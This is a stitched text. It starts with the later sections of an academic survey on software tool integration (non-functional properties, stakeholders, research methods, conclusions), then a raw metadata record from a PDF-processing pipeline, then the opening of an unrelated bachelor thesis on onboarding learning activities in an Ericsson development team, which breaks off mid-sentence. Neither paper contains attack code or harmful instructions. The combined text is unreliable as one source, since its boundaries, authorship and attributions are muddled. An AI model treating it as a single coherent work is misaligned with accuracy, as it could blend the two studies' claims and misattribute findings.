doubts as to whether the different types of integration are in fact “dimensions”, proposing that as mechanisms become increasingly sophisticated, the boundaries between the different types may blur. Later Losavio further detailed this reference model by differentiating between integration targeting the internal organization, external entities and management (Losavio et al., 2002). The most common other type of approach, however, is a classification scheme that differs from Wasserman’s only in the use of more categories within a type of tool integration or by drawing the boundaries between them differently. An example of the former is Brown and McDermid (1992) equating tool integration to data integration, which is then further divided into the carrier, lexical, syntactic, semantic and method levels. An example of the latter is proposed by Brielmann et al. (1993) in the form of the three separate dimensions of control, data and user interface integration. These three dimensions are a combination of Wasserman’s control and process integration, a combination of Wasserman’s data and (part of) platform integration, and the same as Wasserman’s presentation integration, respectively. Data integration is the most commonly discussed type of integration in these approaches, followed by presentation, control and process (in that order). Other approaches add to Wasserman’s classification scheme. Zelkowitz, for example, mentions three notions of tool integration that affect the design of support environments (Zelkowitz, 1996), namely the conceptual (a shared philosophy in regard to the interaction of support environment components), the architectural (how support environment components are constructed to interact) and the physical integration (the interaction of the actual instances of support environment components). A few other approaches make use of wholly different types. The most obvious example in the sources is Wende et al. (2010) using a classification scheme that measures support environments according to two dimensions: extensibility, which in this source is a measure of customizability; and guidance, which is a measure of how well the process of customization of the support environment is supported. This scheme was later further extended by adding reuse, which is a measure of the reuse of shared platform functions between different support environments (Wende et al., 2011). 5.8. Internal Validity of the Findings All references in the iFEST questionnaire that can be related to abstract categories of tool integration fall within the original types of tool integration suggested by Wasserman. Interestingly enough, of these references most relate to data (54%) and platform (18%) integration. Again, it is reasonable to assume that method bias has not lead to incomplete results. The high focus on data and platform integration in the questionnaire, coupled with the survey sources mostly using them “as is” or ignoring them, is an indication that these are the least controversial categories in the discourse. 6. The System Context Based on the high focus on implementation and providing reference models, this section takes a closer look at the system context used by the sources when discussing tool integration. This results in an in-depth discussion of stakeholders relevant to tool integration, since most sources show no conclusive evidence of a well understood system context. To support the internal validity of these findings the stakeholders mentioned by the sources are also related to the iFEST questionnaire. 6.1. Findings Figure 4 shows the distribution of the overall contexts that the sources use to frame their discussion. A few sources generalize, meaning that they imply that tool integration can be treated in a similar way across all contexts. More sources discuss tool integration as framed by systems development, a context that can be further divided into two groups. The first includes those sources that have a narrow focus on only the development phase or provide no detailed definition of systems development. The second includes those sources that at least mention a broader view of other life-cycle phases of systems development, such as maintenance, production, decommission, etc. Similar groups of sources can be found that further restrict themselves to software development. Finally, one group consists of sources that use a specific application domain as a context for discussing tool integration, with the most often used domains being software re-engineering (22%), enterprise applications (19%) and chemical engineering (15%). It is clear that development is the most common context envisioned when discussing the essence of tool integration, either in a narrow (39%) or a broad (32%) sense. This is not a very strong finding, considering that the basis for the survey is a paper in the software engineering field (Wasserman, 1990). However, the initially general or non-existent description of the system context in most sources suggests that it is an unimportant, obvious or overlooked factor. That the system context is unimportant is belied by the other findings in this report, such as the higher level at which some non-functional properties are discussed (see Section 4) and the many sources which elaborate on process integration (see Section 5). To ascertain whether the details of this factor are obvious to or overlooked by those involved in the discourse we further studied the relevant sources. A closer look revealed that only 13% (of all sources) provide a more in-depth discussion of the context of tool integration. Of these, the majority either discuss different scales of organization (20%) or different stakeholders (60%). The former relates to discussing tool integration as important to the individual, the team, the organization and interorganizational relationships. The latter is summarized in Figure 5 by listing the top 5 stakeholders being discussed. These are the tool developers, management (in any related organization), support environment customizers (those putting together a particular instance or providing support for it), support environment designers (those developing the basic support environment software) and end users (in the role of users and customers). This one-sided focus on a narrow set of stakeholders, important to the implementation of a support environment, points at the system context being overlooked rather than obvious to those involved in the discourse. An in-depth discussion of the continuous evolution of a support environment throughout its lifetime would require one to consider the much larger set of stakeholders involved in relevant decision-making, standardization attempts and maintenance. 6.2. Internal Validity of the Findings End users (in the role of users (76%) and customers (16%)) are the only stakeholders mentioned in the iFEST questionnaire to any great degree. It is reasonable to assume that method bias has not lead to an incorrect perception of a high focus on end users, but that the focus on support environment designers is probably higher in the academic discourse than in industrial settings. 7. Research Methods Based on there being few sources that provide in-depth reporting on empirical evidence related to tool integration, this section studies the research methods employed by the different sources. The problem in establishing the validity of the findings for any part of the discourse that takes place outside the academical literature is then highlighted in the second subsection. 7.1. Findings As seen in Table 1, there is a lack of published in-depth empirical data in relation to the discussion on the essence of tool integration. 8 different research methods could be identified when the sources were studied further. The summary of how many sources employed each research method can be found in Figure 6. *Expert knowledge* is a part of all scientific inquiry, but the largest group identified consists of those sources that *only* make use of expert knowledge. This is not necessarily a problem. A reference model or a summary of the State of the Art does not have to include a solid empirical base to be useful, but rather rests on the reasoning of those experts involved in writing it (the paper by Brown (1993b) is a good example of this). However, several of the sources included in this group simply did not provide a description of the methods used, which has to be seen as problematic with regards to judging the validity of their findings. The second largest group consists of those sources that make use of *case studies*, i.e. studies of a limited number of instances of a phenomena. Even though this research method has been criticized over how to ensure that the results are generalizable, this is also not necessarily problematic. Only one of these case studies however, was a critical case study, i.e. set up specifically so that it could answer a particular research question. All of the others were open-ended, exploratory case studies. All of the other groups are formed by research methods that were only used by 1-3% of the sources. These include interviews, questionnaires, mathematical proofs, literature surveys, content analyses and experiments. Most of these groupings are self-explanatory, but it should be noted that only sources providing a description of a literature survey method were included in the literature survey group. In other words, even though most academic papers include some part that discusses relevant literature, this grouping only included those sources that had the explicit purpose to survey a large amount of literature based on well defined selection criteria. ### 7.2. Internal Validity of the Findings Research methods are not discussed in the iFEST questionnaire at all. This part of the paper therefore only provides input to the conclusions in regard to the historical, academic discourse on tool integration. The true distribution of methods employed to gain knowledge on the essence of tool integration may in fact be different, for instance if industrial companies perform a lot of experiments that are never reported. 8. Discussion This section discusses the discourse on the essence of tool integration, its context and the implications in light of the findings presented in the previous sections. New research questions are put forward based on the non-functional properties mentioned throughout the discourse, something which also has implications on the study of stakeholders relevant for tool integration. The problem of evolving Wasserman’s types of tool integration is discussed, with two frequently mentioned redefinitions highlighted. Potentially problematic effects due to the set of research methods currently employed in the discourse are highlighted, and a proposal on how to change this set outlined. The section then closes by discussing the need to further investigate disparate discourses and highlighting the importance of open communities in relation to this. The observant reader may notice that the order of the subsections below do not directly match that implied by the order of the previous sections. While the order of the previous sections follow the size of the initial categories discussed within them, the order of the subsections below was chosen to ease the flow of the discussion. 8.1. A Discourse Focused on Details The non-functional properties identified in Section 4 to some extent provide a previously missing prioritization order. This order is not an objective measure, but rather reflects what has been seen as important by many taking part in the discourse on the essence of tool integration. More importantly, while the overall discourse on tool integration largely focuses on mechanisms (Wicks and Dewar, 2007), the studied discussion related to non-functional properties indicates that the focus should be less on details and more on issues at higher levels. Based on the identified properties, for instance, the following (research) questions merit attention in future research: - Do different application domains put different requirements on tool integration? - How can tool integration support stakeholders in interacting not only with all data in a support environment scaled to modern situations, but with the right data? - How can business models help drive the deployment of tool integration, not just lock users to a single vendor? What is the impact of a technological shift, such as the recent decline in the use of Java in favour of RESTful web services, on an organization employing a modern support environment? When does automating a series of tasks actually provide efficiency gains? How is tool integration standardized? In which standards and by which standardization bodies? These are just representative examples for each of the non-functional properties found in Section 4, more (research) questions akin to these need to be formulated and related research areas inventoried for relevant knowledge. 8.2. An Increased Set of Stakeholders Research questions with a wider scope will require knowledge of more stakeholders than those found in the discourse on the essence of tool integration so far. As shown in Section 6, currently end users receive most of the attention in the discourse even if support environment designers also receive a fair share of the focus in the literature. Based on the questions mentioned in the previous subsection one can, for instance, identify the following stakeholders as being of interest to study further: - **Application domain experts.** As an example, software engineers commonly receive abstract product requirements and implement the design directly in code. Hardware engineers by contrast spend a lot of time in various design tools representing different levels of abstraction. These different domains therefore put different demands on when and why tool integration should be deployed to support development. - **Project managers.** While project managers are end users, they are presumably not only interested in moving data from one tool to another. The possibility to link to data sources throughout the product life-cycle to enable analysis is clear, but to enable any benefits the set of analyses of interest needs to be known. - **Managers.** Managers ultimately decide which solutions are put in place, but the metrics needed to support this decision-making have so far been elusive. Currently the parameters that factor into these equations are largely unknown. - **Support environment administrators.** The deployment of several different systems, or difficulties in configuring systems, impacts administrators to a large degree. This leads to resistance in deploying large-scale support environments and favours ad hoc tool integration. For large-scale support environments to even be considered, the prioritizations of those that will maintain them also needs to be considered. • **Customers.** A modern support environment may enable an increased pace of product releases, something which is already a reality in some software engineering domains. While changes to release frequency may be beneficial in many ways, customers may have difficulties in adopting and become wary if they are not appropriately consulted. • **Standardization organizations.** Even large research projects frequently have problems with standardizing their findings. Standardization organizations are entities of their own and ensuring their approval and use of research findings is not straight-forward. The choice of which stakeholders to study in the end also depends on the context that is being studied. However, currently most researchers feel no need to detail the overall context of their research when discussing the essence of tool integration. As described in Section 6, they either contend that tool integration is straight-forward to generalize or avoid the question altogether by describing their engineering context in vague terms. However, if these “generic” solutions are easily applicable in all contexts, how come the main part of most industrial support environments are instead made up of ad hoc solutions? In reality most of the specialized requirements of different application domains remain unknown, meaning that all claims of generic solutions cannot be said to be based on empirical evidence. In the end the primary motivation for detailing the relevant stakeholders might be to expose the way their motivations differ from case to case, thereby paving the way for configurable tool integration that can enable truly generic support environments. 8.3. *A Note about the Types of Tool Integration* The types of tool integration originally identified by Wasserman are also likely to be treated similarly in relation to a wider context and a larger set of stakeholders. At a higher level of abstraction they combine and elaborate freely into a flexible checklist for discussion of the essence of tool integration. However, although this flexibility has meant that the types have been used extensively, it also means that constant effort is required to maintain a place in the discourse for proposed changes to their definitions. For instance, process integration, as shown in Figure 3, has required constant redefinitions throughout the discourse. This regardless of the fact that even Wasserman later chose to use a wider definition of this type (Wasserman, 1996). Two proposed redefinitions are frequently mentioned but have failed to be used by those not explicitly interested in these specific parts of the discussion: • the notion that the “dimensions” are not independent. With such wide definitions in use, these types are commonly discussed as if they were *de facto* related. This has implications primarily on presentation and process integration, since these are dependent on the other categories to a higher degree (Asplund et al., 2011). A consequence of this view is that not only the types should be discussed in regard to proposed solutions, but also the different dependencies that exist between them. the view that presentation integration should not target uniform environments, but rather enable customized Graphical User Interfaces (GUIs) for users with different needs. Hopefully this paper can in some way facilitate a wider use of these redefinitions. 8.4. Research Methods The most commonly used research methods in the discourse on the essence of tool integration are expert knowledge and exploratory case studies. As discussed in Section 7, this is not necessarily a problem. However, when the research field is permeated by these two research methods and by studies that do not disclose their research designs to any high degree, then it is natural to ask oneself how sure one can be in the validity of the accepted “truths” of the field. Generalizability in particular is not ensured by the repetition of the same opinion by many experts, or by the success of a particular solution in several cases. If more research methods are required to strengthen the claim of validity, which should then be chosen? It could be argued that just using more research methods to encourage the development of different views in a research field is valuable in itself, but if care is not taken then there are potential risks, for instance incoherent theory development (Blessing and Chakrabarti, 2009). Some research methods are also potentially very fruitful, but difficult to use within software engineering (Fenton et al., 1994). A more plausible way forward is to design a change to the set of research methods based on the distinguishing characteristics of the research field itself. One such defining characteristic is the strong focus on software design solutions by researchers in the field. This focus is shown by previous studies (Wicks and Dewar, 2007), the focus on implementations (see Section 3) and the choice of stakeholders in the academic discourse (see Section 6). One conclusion is that research into tool integration is performed just as much with the intent to invent and present new software designs as to provide knowledge on the phenomena of tool integration. A start towards a changed set of research methods is most likely to be successful if it can be motivated in combination with such an intention. A first step by researchers into tool integration should be to consider a shift from exploratory case studies to critical case studies. In other words, more cases should be chosen with care for how easily generalizable their findings are. Flyvbjerg (2011) gives the example of how measuring the impact of handling organic solvents on workers at an enterprise that rigorously follows safety regulations might be generalizable to workers at enterprises that are not as rigorous. Similarly, it may be easier to claim valid findings if a new technology for evolvable and scalable support environments is deployed at an organization undergoing significant growth, rather than at an organization that remains static for the duration of the study. • Considering the large efforts put into implementation, the design of support environments can both attract researchers from other research fields and achieve synergy effects together with them. If a new mechanism for support environments is constructed, then its impact on software customization, data mining, systems engineering and different application domains could be studied in parallel. This would provide the possibility to set up theory triangulation studies (Denzin, 2006), which could foster the use of several research methods in parallel mixed method studies (Tashakkori and Teddlie, 1998). A reasonable assumption is that interviews and content analysis can play a role in such studies, at least in the many cases when the system context is given by such abstract and complex activities as system and software engineering (see Section 6). For example, interviews can be used to collect data on the efficiency of different visualization techniques, with the execution times of the underlying technology simultaneously recorded; defect data can be gathered and statistically analysed, with engineers interviewed on the likely origin of quality problems. Besides helping to ensure validity, diversifying the employed research methods in this way would be beneficial from the perspective of tool integration researchers in other ways. With regard to the critical case studies we argue that it would lead to more focused field studies. With regard to theory triangulation we argue that it would lead to a quicker uptake of State of the Art findings from other research fields. Especially better focused field studies would make it possible to answer such high level research questions as those found in Subsection 8.1. Furthermore, both of these benefits are important not just to academia, but also to the industry. Testing unproven technology quickly and with the intent to identify the boundaries within which it is realistic to use should lead to knowledge that is more valuable to decision makers. 8.5. Disparate Discourses When scanning through the final set of sources, we can identify several expected connections, e.g. the Model-Driven Engineering (MDE) discourse (e.g. through the paper by Kapsammer et al. (2006)). However, there are also some that we did not expect, which connect the targeted discourse to, for example, chemical engineering (e.g. through Marquardt and Nagl (2004)), and software re-engineering (e.g. through Tilley (1995)). As mentioned in the discussion on validity in Subsection 2.2, there may also be relevant findings in unconnected discourses that are difficult to tie to the targeted discourse due to differences in terminologies, research methods and models. We can identify at least one that has a high potential of containing findings relevant for tool integration — namely the discourse on ISO 10303 (informally known as the Standard for the Exchange of Product model data (STEP) standard). The discourse on STEP is primarily focused on data integration (Pratt, 2005), as is the previously mentioned MDE discourse (Giese et al., 2010). This paper shows that the tool integration discourse is not limited to low level implementation details, and the STEP discourse has similar implications. High level issues discussed in the STEP discourse include, for example, business drivers, high level stakeholders and different application domains (Fowler, 1995). It is particularly interesting that this disparate discourse focuses on a standard. We also work with safety standards, such as IEC 61508 (2010), ISO 26262 (2011) and DO-178C (2011a). Changes in industrial practices have required these standards to take tools and tool integration more and more into account. For instance, DO-330 (2011b), which was one of the first released supplements of DO-178C, focuses solely on software tool qualification. Although there is a connection between the targeted discourse and the discourse on these standards (e.g. through (Armengaud et al., 2012)), it is weak. Further research is required to investigate the implications in these and other disparate or weakly connected discourses. Seeing that standardization is an important topic in the targeted discourse, communication of experiences and knowledge across open communities employed in the context of (pre-)standardization could be especially fruitful. Not only would this communication create opportunities for theory triangulation (see the previous subsection), but it would also offer opportunities to observe and interact with a larger set of stakeholders in their particular system contexts. 9. Conclusions By surveying sources in the strands of research focusing on the essence of tool integration, six non-functional properties that are treated as especially important have been identified: flexibility, scalability, cost, evolvability, efficiency and the degree of standardization. In the surveyed sources these properties are discussed both with a narrow focus on technology and a broader focus on how a support environment as a whole impacts its environment. However, this environment, or system context, is vaguely defined, with important stakeholders only discussed in passing if at all. The discussion in the targeted discourse related to the six non-functional properties points at the lack of research into how support environments impact and are impacted by high level issues, such as differences between application domains, business models and organizational efficiency. Redeeming this lack will require a substantial effort to identify the motivations of a larger set of stakeholders and how these motivations differ between different system contexts. Wasserman’s types of tool integration are likely to continue to be used as a flexible checklist, regardless of whether this lack is redeemed or not. However, this checklist would benefit from two changes. Firstly, the notion of an independence between the types needs to be rejected, and each of the dependencies that exists between the types incorporated into the checklist. Secondly, presentation integration should be redefined, focusing on how different users interact with GUls rather than how GUls can be made to look the same. Furthermore, a summary of the research methods used throughout the targeted discourse shows a large proportion of studies that use exploratory case studies or only expert knowledge. This, together with the high number of studies that do not provide details on their research design, motivates a changed set of research methods to ensure validity. A shift towards critical case studies and theory triangulation stands a good chance of acceptance and fruitfulness, based on the common intention to invent and present new software design in the discourse. Finally, there are discourses that are separate from or weakly connected to the targeted discourse, but which have a high probability of containing relevant findings. The examples highlighted by us are standardization discourses, implying that open communities employed in the context of (pre-)standardization could be especially important in furthering the discourse on the essence of tool integration. Acknowledgments Special thanks go to Vicki Derbyshire for her help in proofreading this paper and Jad El-khoury for his advice on how to improve certain parts of it. References Gu, W., 2012. Tool Integration: Model-Based Tool Adapter Construction and Discovery Conforming to OSLC. Master thesis. Uppsala University, Department of Information Technology. Special Committee 205 of RTCA, Inc., 2011a. DO-178C, software considerations in airborne systems and equipment certification. Special Committee 205 of RTCA, Inc., 2011b. DO-330, software tool qualification considerations.
{"Source-Url": "http://www.diva-portal.org/smash/get/diva2:823777/FULLTEXT01.pdf", "len_cl100k_base": 16029, "olmocr-version": "0.1.48", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 104564, "total-output-tokens": 29831, "length": "2e13", "weborganizer": {"__label__adult": 0.0005536079406738281, "__label__art_design": 0.001852989196777344, "__label__crime_law": 0.0003409385681152344, "__label__education_jobs": 0.01043701171875, "__label__entertainment": 0.0001842975616455078, "__label__fashion_beauty": 0.0002903938293457031, "__label__finance_business": 0.0008997917175292969, "__label__food_dining": 0.00037932395935058594, "__label__games": 0.00135040283203125, "__label__hardware": 0.0012044906616210938, "__label__health": 0.0005211830139160156, "__label__history": 0.0008907318115234375, "__label__home_hobbies": 0.00025177001953125, "__label__industrial": 0.0006718635559082031, "__label__literature": 0.0013189315795898438, "__label__politics": 0.0003616809844970703, "__label__religion": 0.0007810592651367188, "__label__science_tech": 0.0672607421875, "__label__social_life": 0.00023055076599121096, "__label__software": 0.0159454345703125, "__label__software_dev": 0.892578125, "__label__sports_fitness": 0.0004253387451171875, "__label__transportation": 0.0007872581481933594, "__label__travel": 0.0002989768981933594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 106857, 0.06091]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 106857, 0.44104]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 106857, 0.87556]], "google_gemma-3-12b-it_contains_pii": [[0, 636, false], [636, 2842, null], [2842, 6405, null], [6405, 9673, null], [9673, 12720, null], [12720, 16168, null], [16168, 19652, null], [19652, 23120, null], [23120, 27973, null], [27973, 30779, null], [30779, 31766, null], [31766, 33150, null], [33150, 36336, null], [36336, 39160, null], [39160, 41361, null], [41361, 43972, null], [43972, 47204, null], [47204, 50235, null], [50235, 52462, null], [52462, 54413, null], [54413, 56578, null], [56578, 59122, null], [59122, 61642, null], [61642, 64789, null], [64789, 67758, null], [67758, 70854, null], [70854, 74116, null], [74116, 76425, null], [76425, 78934, null], [78934, 81465, null], [81465, 83859, null], [83859, 86133, null], [86133, 88589, null], [88589, 91087, null], [91087, 93559, null], [93559, 95955, null], [95955, 98376, null], [98376, 100843, null], [100843, 103310, null], [103310, 105886, null], [105886, 106857, null]], "google_gemma-3-12b-it_is_public_document": [[0, 636, true], [636, 2842, null], [2842, 6405, null], [6405, 9673, null], [9673, 12720, null], [12720, 16168, null], [16168, 19652, null], [19652, 23120, null], [23120, 27973, null], [27973, 30779, null], [30779, 31766, null], [31766, 33150, null], [33150, 36336, null], [36336, 39160, null], [39160, 41361, null], [41361, 43972, null], [43972, 47204, null], [47204, 50235, null], [50235, 52462, null], [52462, 54413, null], [54413, 56578, null], [56578, 59122, null], [59122, 61642, null], [61642, 64789, null], [64789, 67758, null], [67758, 70854, null], [70854, 74116, null], [74116, 76425, null], [76425, 78934, null], [78934, 81465, null], [81465, 83859, null], [83859, 86133, null], [86133, 88589, null], [88589, 91087, null], [91087, 93559, null], [93559, 95955, null], [95955, 98376, null], [98376, 100843, null], [100843, 103310, null], [103310, 105886, null], [105886, 106857, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 106857, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 106857, null]], "pdf_page_numbers": [[0, 636, 1], [636, 2842, 2], [2842, 6405, 3], [6405, 9673, 4], [9673, 12720, 5], [12720, 16168, 6], [16168, 19652, 7], [19652, 23120, 8], [23120, 27973, 9], [27973, 30779, 10], [30779, 31766, 11], [31766, 33150, 12], [33150, 36336, 13], [36336, 39160, 14], [39160, 41361, 15], [41361, 43972, 16], [43972, 47204, 17], [47204, 50235, 18], [50235, 52462, 19], [52462, 54413, 20], [54413, 56578, 21], [56578, 59122, 22], [59122, 61642, 23], [61642, 64789, 24], [64789, 67758, 25], [67758, 70854, 26], [70854, 74116, 27], [74116, 76425, 28], [76425, 78934, 29], [78934, 81465, 30], [81465, 83859, 31], [83859, 86133, 32], [86133, 88589, 33], [88589, 91087, 34], [91087, 93559, 35], [93559, 95955, 36], [95955, 98376, 37], [98376, 100843, 38], [100843, 103310, 39], [103310, 105886, 40], [105886, 106857, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 106857, 0.03562]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
135424f3f5b703f6f581bb7dd6070f2f5cca7b4c
Product-Related Learning Activities and Their Impact on the Effectiveness of the Onboarding Process in a Software Development Team Bachelor of Science Thesis in Software Engineering and Management AMANDA HOFFSTRÖM The Author grants to University of Gothenburg and Chalmers University of Technology the non-exclusive right to publish the Work electronically and in a non-commercial purpose make it accessible on the Internet. The Author warrants that he/she is the author to the Work, and warrants that the Work does not contain text, pictures or other material that violates copyright law. The Author shall, when transferring the rights of the Work to a third party (for example a publisher or a company), acknowledge the third party about this agreement. If the Author has signed a copyright agreement with a third party regarding the Work, the Author warrants hereby that he/she has obtained any necessary permission from this third party to let University of Gothenburg and Chalmers University of Technology store the Work electronically and make it accessible on the Internet. Product-Related Learning Activities and Their Impact on the Effectiveness of the Onboarding Process in a Software Development Team AMANDA EVELINA HOFFSTRÖM © AMANDA EVELINA HOFFSTRÖM June 2018. Supervisor: JAN-PHILIPP STEGĦOFER Examiner: LUCAS GRE University of Gothenburg Chalmers University of Technology Department of Computer Science and Engineering SE-412 96 Göteborg Sweden Telephone + 46 (0)31-772 1000 Department of Computer Science and Engineering UNIVERSITY OF GOTHENBURG CHALMERS UNIVERSITY OF TECHNOLOGY Gothenburg, Sweden 2018 Product-Related Learning Activities and Their Impact on the Effectiveness of Onboarding in a Software Development Team Amanda Hoffström¹ Abstract—The effectiveness of the onboarding is of importance to Information Technology (IT) companies since it determines how fast and how well the novice becomes integrated and independent in his or her new role as a developer. The onboarding process in most IT companies is often insufficient or non-existent. In this paper, action design science was conducted to investigate the current onboarding process in Ericsson to find areas for improvement. Two areas were found to be subject for enhancement – technical knowledge, and organizational knowledge. A product-related workshop was developed and integrated into a development team at Ericsson to examine its effect on the effectiveness of the onboarding process. The workshop consisted of Pecha Kucha presentations to enhance technical knowledge, and LEGO building workshop to enhance organizational knowledge. The workshop showed a modest positive improvement of the organizational knowledge, and no improvement of the technical knowledge. Keywords—Product-related learning, onboarding, evaluation, LEGO, Pecha Kucha, active learning, team-building I. INTRODUCTION Onboarding is the process of socialization when a novice, such as a new employee or current employee that enters a new team or project, is comprehending and adjusting to technical and social aspects of a new team, project and/or system [1]. A developer who is established and integrated in a team or project spends around 50 percent of the time on understanding the system, while developing accounts for only 15 percent [2]. During onboarding, the novice often faces challenges particularly regarding the understanding of the product. This indicates that the most time demanding task for a developer, is also the most demanding task for a novice [3]. An even more considerable issue is that, in many cases, no formal onboarding process is present at all. In the cases that they are present however, the process is seldom quality controlled [4]. The absence of quality control means that it is not measured or evaluated whether the onboarding prepares the novice well-enough in understanding the often big and complex product on which he or she will be working. For the novice to achieve sufficient knowledge and skills about the product through the onboarding process, the following tasks are essential; (1) comprehension of the code and its connection to other development artifacts, (2) understanding of the development process, (3) knowing who to contact for what issues, and (4) which approach is usually taken to handle issues. These activities, also must follow a learning curve, scale to a larger number of novices and to be diverse enough to cover different intended learning outcomes [5]. Ericsson is one of the leading telecom companies in the world that compete for the release of 5G. To remain market leaders, the company is presently going through a re-organization that requires repositioning current employees as well as hiring new employees. These are aspects that bring out the importance of an effective onboarding process. The effectiveness of an onboarding process describes how the characteristics of the individuals, the onboarding and the organization influence the learning activities and their outcomes. For an onboarding process to be effective, it needs to meet the needs (quick and product-related knowledge acquisition) of the organization and the individual during and after the onboarding. To make the onboarding process at Ericsson more effective, a new learning activity is introduced to the onboarding process. A clear connection of the learning activity to concrete product-related learning outcomes is anticipated to help the novice become product proficient faster. Additionally, it is also anticipated to help the novice become independent and confident in solving issues and taking help from the right people [5]. Product-related learning refers to tasks that are explicitly related to the product, in the form of user stories and concrete development tasks, as well as issues regarding the environment around the product, such as troubleshooting, architecture and design, and continuous integration machinery. The goal of this study is to introduce a learning activity that generates a more product relevant outcome of the onboarding process in one of Ericsson’s newly formed teams in the organization CNA. The learning activity and its evaluation is also the main contribution of this study. The learning activity is created and developed by conducting an action design research study [7]. Further, the scientific and technical contributions that this introduced learning activity yields include: - the investigation of the intended learning outcomes of the onboarding process of one team within the CNA organization in Ericsson, - what learning activities are implemented to fulfill the learning outcomes, - what impact these activities and outcomes have on the effectiveness of the onboarding, and - how the effectiveness is evaluated. II. RELATED WORK To develop a learning activity that aims to enhance onboarding effectiveness, it is important to be guided by aspects that make up a successful process, as described by Johnson and Senges [5]. Based on the four aspects [5], (1) comprehension of the code and its connection to other development artifacts, (2) understanding of the development process, (3) knowing who to contact for what issues, and (4) which approach is usually taken to handle issues, that this learning activity must be created. Further, Johnson and Senges [5] mention the importance of following a learning curve that is steep enough to stimulate the learning of each individual, but not so steep that the learning seem unreachable. Before the development of the artifact can take place, it is also important to research the concrete problem in the development team and compare it to the general problem domain as described by Tiarks [3] and Graybill et al. [4] to establish the concrete problem’s generic discourse relevance. Adequate learning styles, or ways of learning, is another area that impacts the development and evaluation of a learning activity in the onboarding process. When designing the learning activity it is important that it is created to yield the best possible outcome for the team members in their learning. Active learning is described as resulting in high knowledge retention in the students or participants of such an activity. Therefore, during development of the learning activity, Edgar Dale’s [8] Cone of Experience is studied to design activities that require active participation of the team members to ensure high remembrance. In this study, a team-building learning activity was introduced to enhance the product-related learning. According to research [16][17][18], team-building interventions’ effect on productivity are difficult to measure due to the predicament to determine correlation and causation. Buller and Bell [16] conducted a study where they analyzed the effect of team-building (and goal setting) on productivity. Their results were inconclusive but indicated a small improvement in some performance and strategy measures. However, the study could not deduce the team-building to be the absolute cause of the improvements. Salas et al. [18] suggest a non-significant improvement on performance from team-building interventions. According to their conclusions, only around 1 percent of the possible factors of fluctuation in a team’s performance can be derived to team-building interventions. The study also concludes that the effect of the team-building interventions diminishes as the size of the team increases. Klein et al. [17] study is an update on Salas et al. [18] study summarized above. In contrast to Salas et al., Klein et al. arrive at the conclusion that team-building has a “positive moderate” effect on factors like performance. The study also investigates how team size effects the team-building impact, indicating that small (less than 5 members) and medium teams (5 to 10 members) showed a modest positive effect from team-building. However, teams with over 10 members seem to have a greater positive impact from team-building. These papers were used to understand the impact the team-building might have on the team in this study. III. RESEARCH METHODOLOGY In order to understand the state of the art of the onboarding at Ericsson and how the onboarding effectiveness can be improved the following research questions were formulated: RQ1: What are the intended learning outcomes of the onboarding process in the organization CNA within Ericsson, and what learning activities are involved to complete the outcomes? RQ2: What learning activities can be introduced to the current onboarding process to enhance product-related learning? A. Action Design Research Contingent on the research questions, which require gathering of complex and versatile information from individuals within a restricted population with a unique context, where an artifact (the learning activity) is developed and integrated, action design research (ADR) was identified as beneficial for the conduction and outcome of this study. ADR allows for the creation of an ensemble artifact [7], whose creation cycle is not sequential and does not separate development and design from organizational and social context, even upon idea initialization. ADR further allows for the problem formulation, development, intervention and evaluation to happen in parallel to learning and reflection. This leads to a cyclic and iterative nature of artifact development – ensuring that the context in which the artifact is placed, is not disregarded. ADR favors a constructivist approach where the artifact is not isolated from it’s social context. ADR supports two contrasting issues: (1) engaging in a problem situation occurring in a specific organizational setting, through intervention and evaluation, and (2) the construction and evaluation of an artifact that tackles the class of problems represented by the specific situation and organizational setting. This method is suitable for addressing the RQs, that together form the same concrete contrasting issues: (1) intervention and evaluation of a given situation in a real and unique organizational setting – i.e. the specific team in Ericsson, and (2) constructing and evaluating a learning activity that will be part of the onboarding in the same unique organizational setting. The context is fitting for ADR since many team members are still undergoing onboarding while this study is conducted, which promotes iterative intervention and evaluation throughout the development [7]. In this study, the research was divided into three cycles, or iterations. The first cycle, idea initialization, focuses on the investigation of the current situation of the onboarding, as well as an idea formulation with input from the sample team and the knowledge body. The investigation of the current situation includes learning about the existing onboarding process and its intended outcomes (RQ1). The second cycle, artifact development, was focused on developing an artifact from the knowledge gathered in cycle 1. This development was done together with the team through brainstorming, and through intervention with relevant research in the knowledge body (RQ2), such as papers on Pecha Kucha Presentations [15], LEGO workshops [9][12] and active learning [8]. In the end of this cycle, the artifact was implemented with the team. Cycle three, artifact evaluation and analysis, focuses on evaluation and analysis of the implementation of the artifact. The evaluation assesses whether the artifact did B. The Team The sample team was a development team that is responsible for support of parts of continuous integration (CI) machinery. They work with a wide range of different tasks from trouble reports to visualization tools, and they closely interact with mainly four other CI teams. The sample team consists of five people, who are all developers with various experiences and backgrounds. All team members were novices in the team. Additionally, there was one more team participating in the workshop. This team was not part of the sample for this research, but participated to enable the learning outcomes for the sample team. C. The Cycles Cycle 1 - Idea Initialization During this cycle, the team members were interviewed about their onboarding process - resulting in a total of five interviews. The interviews elicited the team members’ opinions about the onboarding in order to yield an understanding of what the intended learning outcomes are and what activities are involved to reach said outcomes. Based on this information, the idea was formulated to comprise an activity that could improve the effectiveness of the onboarding. Further, the concrete information and idea based in this team, was conceptualized into an instance of the problem 